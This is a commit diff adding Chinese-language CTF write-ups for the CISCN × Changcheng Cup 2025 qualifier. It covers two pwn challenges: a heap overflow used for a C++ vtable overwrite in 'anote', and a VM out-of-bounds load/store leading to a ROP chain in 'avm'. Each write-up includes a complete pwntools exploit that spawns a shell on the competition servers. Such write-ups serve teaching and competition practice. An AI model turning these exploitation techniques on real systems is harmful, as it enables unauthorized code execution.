add ciscnxccb2025

Author: RocketMaDev

ciscnxccb2025/README.md

@@ -0,0 +1,17 @@
+# 国赛 暨 长城杯 2025
+
+## 初赛
+
+在0RAYS队伍中参赛，最终在浙江赛区位列98名。
+
+1. [anote](anote.md)
+2. [avm](avm.md)
+3. Anyip（赛后复现）(TODO)
+4. novel1
+5. server
+
+## 半决赛
+
+我们队上半场awdp排名22，下半场渗透排名12，最终排名14，成功进军长城杯和国赛的决赛。
+
+[半决赛博客](https://rocketma.dev/2025/03/19/semifinal/)

ciscnxccb2025/anote.md

@@ -0,0 +1,69 @@
+# anote
+
+## 文件属性
+
+|属性  |值    |
+|------|------|
+|Arch  |i386  |
+|RELRO|Partial|
+|Canary|on    |
+|NX    |on    |
+|PIE   |off   |
+|strip |yes   |
+
+## 解题思路
+
+32位菜单题，`add`不能输入内容，`edit`时可以溢出写(`0x28 > 0x1c`)，`show`会泄露堆地址。
+由于是C++题，申请的堆块开头存在一个虚表，在edit完成时调用，可以通过溢出写覆盖虚表。
+通过`show`泄露堆地址后，可以在堆上写一个虚表，并在其中写上程序中的后门地址，然后调用`edit`即可拿shell。
+
+<img src="assets/noteheap.png" width="80%">
+
+<img src="assets/telenote.png" width="80%">
+
+## EXPLOIT
+
+```python
+from pwn import *
+context.terminal = ['tmux','splitw','-h']
+GOLD_TEXT = lambda x: f'\x1b[33m{x}\x1b[0m'
+EXE = './anote'
+
+def payload(lo: int):
+    global sh
+    if lo:
+        sh = process(EXE)
+        if lo & 2:
+            gdb.attach(sh)
+    else:
+        sh = remote('101.200.198.105', 22673)
+
+    def add():
+        sh.sendlineafter(b'ice>>', b'1')
+
+    def show(idx: int) -> int:
+        sh.sendlineafter(b'ice>>', b'2')
+        sh.sendlineafter(b'index', str(idx).encode())
+        sh.recvuntil(b'gift: ')
+        return int(sh.recvline(), 16)
+
+    def edit(idx: int, size: int, buf: bytes):
+        sh.sendlineafter(b'ice>>', b'3')
+        sh.sendlineafter(b'index', str(idx).encode())
+        sh.sendlineafter(b'len', str(size).encode())
+        sh.sendlineafter(b'content', buf)
+
+    add()
+    add()
+    heap = show(0)
+    backdoor = 0x80489ce
+    success(GOLD_TEXT(f"Leak heap: {heap:#x}"))
+    edit(0, 0x1c, p32(backdoor) + b'0'*0x10 + p32(0x21) + p32(heap + 8))
+    edit(1, 0, b'x')
+        
+    sh.clean()
+    sh.interactive()
+    sh.close()
+```
+
+![](assets/anoteFLAG.png)

ciscnxccb2025/assets/anoteFLAG.png

@@ -0,0 +1,92 @@
+# avm
+
+## 文件属性
+
+|属性  |值    |
+|------|------|
+|Arch  |amd64 |
+|RELRO |Full  |
+|Canary|on    |
+|NX    |on    |
+|PIE   |on    |
+|strip |yes   |
+|libc  |2.35-0ubuntu3.8|
+
+## 解题思路
+
+程序构造了一个类似于mips的vm，在bss上放着vm的结构，包含32个64位寄存器，text地址，
+pc和text终结地址。每一条指令都占4字节，布局为5位的dest寄存器，5位的from寄存器，
+12位的offset和4位的opcode。opcode共映射到10个函数，其中的`f9`和`f10`对偏移的判断存在逻辑错误：
+由于使用`byte`(`unsigned char`)强制转换，导致该式永远成立，因此可以实现越界store和load。
+
+![](assets/errorcode.png)
+
+从`main`的返回地址`__libc_start_main`获取libc，从`main`的rbp获取1（程序不支持imm），
+然后构造出`pop rdi`、`/bin/sh`和`system`的地址并覆写vm函数的返回地址，实现rop拿shell。
+
+## EXPLOIT
+
+```python
+from pwn import *
+context.terminal = ['tmux','splitw','-h']
+GOLD_TEXT = lambda x: f'\x1b[33m{x}\x1b[0m'
+EXE = './avm'
+
+ADD     = 1
+SUB     = 2
+MUL     = 3
+DIV     = 4
+XOR     = 5
+AND     = 6
+LSHIFT  = 7
+RSHIFT  = 8
+STORE   = 9
+LOAD    = 10
+
+def payload(lo: int):
+    global sh
+    if lo:
+        sh = process(EXE)
+        if lo & 2:
+            gdb.attach(sh, 'b *$rebase(0x1afc)\nb *$rebase(0x1aaf)\n')
+    else:
+        sh = remote('39.105.102.220', 26719)
+    libc = ELF('/home/Rocket/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6')
+
+    # 0x29d90 -> leak; 0x2a3e5 -> pop rdi; 0x1d8678 -> /bin/sh; 0x50d70 -> system
+    leak = 0x29d90
+    def assemble(buf: bytearray, op: int, dst: int, reg1: int, reg2: int):
+        buf.extend(p32((op << 28) + (reg2 << 16) + (reg1 << 5) + dst))
+
+    def construct(buf: bytearray, dst: int, num: int):
+        stack = []
+        while num:
+            stack.append(num & 1)
+            num >>= 1
+        while stack: # 10110 -> 0 1 1 0 1 -> 10110
+            if stack.pop(): # 1
+                assemble(buf, ADD, dst, dst, 1)
+            if len(stack) > 0:
+                assemble(buf, LSHIFT, dst, dst, 1)
+        assemble(buf, ADD, dst, dst, 2)
+
+    ops = bytearray()
+    assemble(ops, LOAD, 2, 0, 0xd38) # r2 = leak
+    assemble(ops, LOAD, 1, 0, 0xd30) # r1 = 1
+    construct(ops, 3, 0x2a3e5 - leak) # r3 = pop rdi
+    construct(ops, 4, 0x1d8678 - leak) # r4 = /bin/sh
+    construct(ops, 5, 0x50d70 - leak) # r5 = system
+    construct(ops, 6, 0x2a3e6 - leak) # r6 = ret
+    assemble(ops, STORE, 3, 0, 0x118)
+    assemble(ops, STORE, 4, 0, 0x120)
+    assemble(ops, STORE, 6, 0, 0x128)
+    assemble(ops, STORE, 5, 0, 0x130)
+
+    sh.sendafter(b'opcode', bytes(ops))
+
+    sh.clean()
+    sh.interactive()
+    sh.close()
+```
+
+![](assets/avmFLAG.png)